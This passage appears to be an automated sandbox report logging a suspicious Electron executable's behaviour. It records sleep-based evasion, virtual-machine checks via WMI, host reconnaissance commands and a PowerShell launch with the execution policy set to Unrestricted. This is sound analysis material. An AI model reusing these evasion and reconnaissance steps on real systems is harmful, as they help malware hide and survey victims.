Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132 Thread sleep count: 901 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012 Thread sleep count: 1633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180 Thread sleep count: 530 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200 Thread sleep count: 1414 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep count: 556 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624 Thread sleep count: 6850 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep count: 2880 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep count: 7058 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756 Thread sleep count: 2669 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268 Thread sleep count: 3120 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788 Thread sleep count: 891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4472 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432 Thread sleep count: 2114 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep count: 2030 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620 Thread sleep count: 1668 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924 Thread sleep count: 1342 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2192 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\resources
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1
Source: IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: VMware Fusion 4 has corrupt rendering with Win Vista+
Source: IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: VMware can crash with older drivers and WebGL content
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "c:\users\user~1\appdata\local\temp\2pvtpes5t7aov3exnwrywytfi10\ionixnginx.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\hgekorcpiasneymc" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Process created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "c:\users\user~1\appdata\local\temp\2pvtpes5t7aov3exnwrywytfi10\ionixnginx.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
